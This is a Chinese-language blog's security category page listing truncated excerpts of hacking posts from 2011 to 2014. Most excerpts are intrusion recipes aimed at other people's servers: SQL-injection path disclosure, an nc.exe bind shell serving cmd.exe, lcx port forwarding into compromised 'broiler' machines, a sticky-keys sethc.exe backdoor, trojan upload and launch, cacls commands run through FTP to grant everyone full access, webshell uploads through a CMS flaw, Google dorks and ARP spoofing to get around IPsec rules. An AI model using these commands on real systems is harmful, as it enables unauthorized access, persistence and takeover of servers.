随笔分类 -  网络安全

摘要:网络上的计算机很容易被黑客利用工具或其它手段进行扫描,以寻找系统中的漏洞,然后再针对漏洞进行攻击。 通过伪装Linux系统,给黑客设置系统假象,可以加大黑客对系统的分析难度,引诱他们步入歧途,从而进一步提高计算机系统的安全性。下面以Red Hat Linux为例,针对几种黑客常用的途径介绍一些常用... 阅读全文
posted @ 2014-07-21 15:33 星星的学习小志 阅读(923) 评论(0) 推荐(0) 编辑
摘要:查找“CDN、负载均衡、反向代理”等大型网络真实IP地址的方法首先,CDN、负载均衡、反向代理还分为很多层,有时查出来的是最外层的 CDN 服务器群,真实的机器是不对外开放的,类似这样的:用户 → CDN 网络 → 一台或多台真实机器 ↗ CDN Server 1 ↘用户 ... 阅读全文
posted @ 2014-04-23 00:07 星星的学习小志 阅读(759) 评论(0) 推荐(0) 编辑
摘要:1、单引号爆路径说明:直接在URL后面加单引号,要求单引号没有被过滤(gpc=off)且服务器默认返回错误信息。Eg:www.xxx.com/news.php?id=149′2、错误参数值爆路径说明:将要提交的参数值改成错误值,比如-1。单引号被过滤时不妨试试。Eg:www.xxx.com/researcharchive.php?id=-13、Google爆路径说明:结合关键字和site语法搜索出错页面的网页快照,常见关键字有warning和fatal error。注意,如果目标站点是二级域名,site接的是其对应的顶级域名,这样得到的信息要多得多。Eg:Site:xxx.edu.tw war 阅读全文
posted @ 2011-06-15 20:09 星星的学习小志 阅读(313) 评论(0) 推荐(0) 编辑
摘要:D:\virtualhost\web580651\www\ 新网虚拟主机F:\usr\fw04408\xpinfo\ 万网虚拟主机D:\hosting\wwwroot\ Prim@Hosting虚拟主机e:\wwwroot\longzhihu\wwwroot\ 华众虚拟主机d:\freehost\zhoudeyang\web\ 星外虚拟主机主机D:\vhostroot\LocalUser\gdrt\ 星外分支f:\host\wz8088\web\ 星外分支D:\Vhost\WebRoot\51dancecn\ 未知D:\vhostroot\localuser\ vhostroot 阅读全文
posted @ 2011-06-14 10:22 星星的学习小志 阅读(292) 评论(0) 推荐(0) 编辑
摘要:查了文件后,发现 client.php 被人修改过,时间也正是这一天。查了文件后,对比了下以前备份的文件。多了这样的代码原文件这一段正常的是这样的: function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') { $isuid = intval($isuid); $return = call_user_func(UC_API_FUNC, 'user', 'login', array( 阅读全文
posted @ 2011-06-14 09:32 星星的学习小志 阅读(320) 评论(0) 推荐(0) 编辑
摘要:最近发现电脑速度明显变慢,杀毒又杀不出来,于是进入C盘,发现有一个很奇怪的文件夹,打不开也删不掉,于是便出现了下面的事:大家都知道在Windows中“\”符号是路径的分隔符号,比如“C:\Windows\”的意思就是C分区中的Windows文件夹,“C:\Windows\System.exe”的意思就是C分区中的Windows文件夹中的System.exe文件,好继续我们假设一下: 如果文件名中有“\”符号会怎么样呢?假如“S\”是一个文件夹的名字,这个文件夹位于:“F:\”,他的路径就是“F:\S\”,当我们试图访问的时候Windows会错误的认为我们要打开的文件是C分区的S文件夹,这样Wi 阅读全文
posted @ 2011-06-05 00:14 星星的学习小志 阅读(435) 评论(0) 推荐(0) 编辑
摘要:【方案一】以点结尾的文件夹 代码:rem 创建以点结尾的文件夹md "C:\test"md "C:\test\batcher..\"代码:rem 把以点结尾的文件夹重命名为普通文件夹rem 短文件名可以使用dir/x命令获得ren "C:\test\BATCHE~1" "batcher"代码:rem 把普通文件夹重命名为以点结尾的文件夹ren "C:\test\batcher" "batcher../"代码:rem 打开以点结尾的文件夹start "" & 阅读全文
posted @ 2011-06-05 00:07 星星的学习小志 阅读(763) 评论(0) 推荐(0) 编辑
摘要:环境说明: Server-U 不可利用 pcAnywhere没有安装提权思路: 上传NC,进行反弹连接。命令说明:nc -l -p 110 -t -e c:\winnt\system32\cmd.exe-l 监听本地入栈信息-p port 打开本地端口-t 以telnet形式应答入栈请求-e 程序重定向C:\RECYCLER\cmd.exeC:\RECYCLER\nc -l -p 110 -t -e c:\winnt\system32\cmd.exeC:\RECYCLER\nc -l -p 110 -t -e C:\RECYCLER\cmd.exe接下来留给我们的空间就比较充足了,我们可以添加 阅读全文
posted @ 2011-05-31 20:41 星星的学习小志 阅读(1073) 评论(0) 推荐(0) 编辑
摘要:lcx.exe的使用方法以前抓肉鸡都是通过1433弱口令,然后..但是发现很多服务器开了1433,3389,但是终端是连不上的,因为服务器本身是在内网,只对外开放了1433端口,幸好有lcx.exe这个东西,用sqltools.exe传倒服务器上...lcx.exe是个端口转发工具,相当于把肉鸡A上的3389端口转发到B机上,当然这个B机必须有外网IP.这样链接B机的3389度端口就相当于链接A机的3389.用法:如在本机B上监听-listen513389,在肉鸡A上运行-slave本机ip51肉鸡ip3389那么在本地连127.0.0.1就可以连肉鸡的3389.第二条是本机转向。例:现在有一 阅读全文
posted @ 2011-05-31 20:41 星星的学习小志 阅读(2147) 评论(0) 推荐(0) 编辑
摘要:今晚在搞http://gov.com.im/的时候拿下旁站权限,但不能夸到目标站的目录下,眼看目标就在眼前却被最后一道关卡给卡死了。之前也有尝试过pr提权,单asp一执行pr就卡死了。。 无奈之下找了群里龙儿心一起来研究,龙儿心经验不错,到shell上立马就搞定了目标站的路径,获取IIS网站路劲和其他基本信息也是使用一个VBS脚本搞定的,这个在我blog中有一个文章帖出来代码。这里我将就再帖下,并说明用法!Set ObjService=GetObject("IIS://LocalHost/W3SVC") For Each obj3w In objservice If IsN 阅读全文
posted @ 2011-05-28 17:19 星星的学习小志 阅读(541) 评论(0) 推荐(0) 编辑
摘要:由校园网CMS系统(xyadmin)上传漏洞想到的2009-09-27 04:27校园网CMS系统(xyadmin)上传漏洞 google关键字:inurl:xyadmin 我们的工具还是g.cn google hack 我们随便点一个连接看看 这个是上传页面xyadmin/situjiaduotu.asp?formname=baseinfoform&editname=logol&uppath=baseinfo&filelx=.swf.gif.jpg 传马拿shell xyadmin是校园的缩写 那么其他的如xxadmin可否呢? http://rnx.tjuci.ed 阅读全文
posted @ 2011-05-28 08:08 星星的学习小志 阅读(557) 评论(0) 推荐(0) 编辑
摘要:Mssql:<!–#include file=”conn.asp”–><%hid=request.QueryString(“id”)sql=”select * from admin where id=”&hidset rs=conn.execute (sql)%>Access:<%db=”aspzhuru.mdb”‘这里修改数据库路径或名称Set conn = Server.CreateObject(“ADODB.Connection”)dbpath=”Provider=Microsoft.Jet.OLEDB.4.0;Data Source=” & 阅读全文
posted @ 2011-05-20 00:41 星星的学习小志 阅读(375) 评论(0) 推荐(0) 编辑
摘要:把下面保存成 Test.php <? $mysql_server_name = "localhost"; $mysql_username = "root"; $mysql_password = "password"; $mysql_database = "phpzr"; //??ݿ?? $conn=mysql_connect( $mysql_server_name, $mysql_username, $mysql_password ); mysql_select_db($mysql_database,$con 阅读全文
posted @ 2011-05-20 00:34 星星的学习小志 阅读(442) 评论(0) 推荐(0) 编辑
摘要:quote site exec "cacls.exe d: /e /t /g everyone:F" #把d盘设置为everyone可以浏览这样一会导出文件放D盘就可以下载了... quote site exec "regedit -e D:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip" #导出注册表里关于TCP/IP筛选的第一处 (-e D:\1.reg 导出后放在D盘下,文件1.reg) quote site exec "regedit -e D:\2.reg H 阅读全文
posted @ 2011-05-20 00:34 星星的学习小志 阅读(258) 评论(0) 推荐(0) 编辑
摘要:可以执行CMD时候 1.A:将远控的后缀改为.tmp,然后上传上去~! B:将该远控传上去。C:用命令start e:/admin/admin.tmp,然后等着木马上线~! 2.替换服务 提权shift键 A:在CMD下执行一下命令: copy c:\windows\explorer.exe c:\windows\system32\sethc.exe copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe B:链接远程桌面,然后连续按5次shift键,就可以浏览C盘了~!然后C盘windows里面TSa 阅读全文
posted @ 2011-05-19 11:16 星星的学习小志 阅读(593) 评论(0) 推荐(0) 编辑
摘要:找终端: 第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! 而终端所对应的服务名为:TermService 第二步:用netstat -ano命令,列出所有端口对应的PID值! 找到PID值所对应的端口1.通用方法regedit /e c:\3389.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"type c:\3389.reg | find "PortNumber"del c:\338 阅读全文
posted @ 2011-05-17 14:23 星星的学习小志 阅读(679) 评论(0) 推荐(0) 编辑
摘要:拿下一个网站的账号密码。进了后台后发现有备份。高兴ing上传一个JPG格式的马儿。找到路径。备份确出现了满以为会想其他站一样的成功,因为在通常情况下asa解析出来和asp差不多。确不然,因为网站再设置的时候删除了asa cer 等其他映射,只保留了html和asp的映射,但是这里确将备份文件后缀改为asa,这时候访问的时候是不会出现常见的黑屏(后门马儿)。怎么突破了,在网上也没找到资料。于是自己研究了下,保留了ASP映射,那么就只能使其为asp后缀才能解析。那该怎么不要这个ASA了。于是想到了#号,因为在URL中会自动去掉#以后的保留前面的地址。于是一个方法产生鸟。1,上传jpg格式的马儿。2 阅读全文
posted @ 2011-05-16 15:31 星星的学习小志 阅读(291) 评论(0) 推荐(0) 编辑
摘要:察看基本情况:info:xx.com 返回一些基本信息site:xx.com 返回所有与该有关的urllink:xx.com 返回所有与该站做了连接的站site:xx.com filetype:txt 查找TXT文件 其他的依次内推查找后台site:xx.com intext:管理site:xx.com inurl:loginsite:xx.com intitle:后台查看服务器使用的程序site:xx.com filetype:aspsite:xx.com filetype:phpsite:xx.com filetype:jspsite:xx.com filetype:aspx查看上传漏洞: 阅读全文
posted @ 2011-05-16 15:30 星星的学习小志 阅读(198) 评论(0) 推荐(0) 编辑
摘要:之前提到过Google Hack,一篇是:Google hack 之精简部分另外一篇是:Google Hacking的实现以及应用这里更新几个新的Google Hack技巧1.phonebook:+英文姓名作用:搜索电话号码簿,将会返回美国人姓名街道地址和电话号码列表,均真实,对需要大量美国地址的朋友很有用,只要是英文姓名都能找到。例:phonebook:tom另外还有两个小分类:rphonebook:仅搜索住宅用户电话号码簿;bphonebook:仅搜索商业的电话号码簿。2.cache:+网址作用:打开google对该网址的缓存页,很多被删掉的文章或网站,只要知道链接就可以用这种方法打开,但 阅读全文
posted @ 2011-05-16 15:29 星星的学习小志 阅读(570) 评论(0) 推荐(0) 编辑
摘要:这几天比较背,碰上的所有服务器都用了windows的安全策略,比如3389与1433只对特定的ip可以访问。就算搞定了同网段的机器,也没法连接或者扫到一些信息。arp欺骗就算搞到了3389密码,也没法的登陆呢。结合群里面的讨论与hsren的交流,打算下一步大概要实现以下目标:目标a计算机,有ipsec策略限制,对ip为b的才能连接。假设已经搞定了a同网段的c机器,现在我的机器ip为d。实现d可以连接a。正常的ip通信是: b->c->a ,返回是a->c->b。那么只要在实施arp欺骗的机器c上,在c->a这步将ip包的源地址改成d的,反过来a回复的时候,将目的地 阅读全文
posted @ 2011-05-16 15:28 星星的学习小志 阅读(414) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示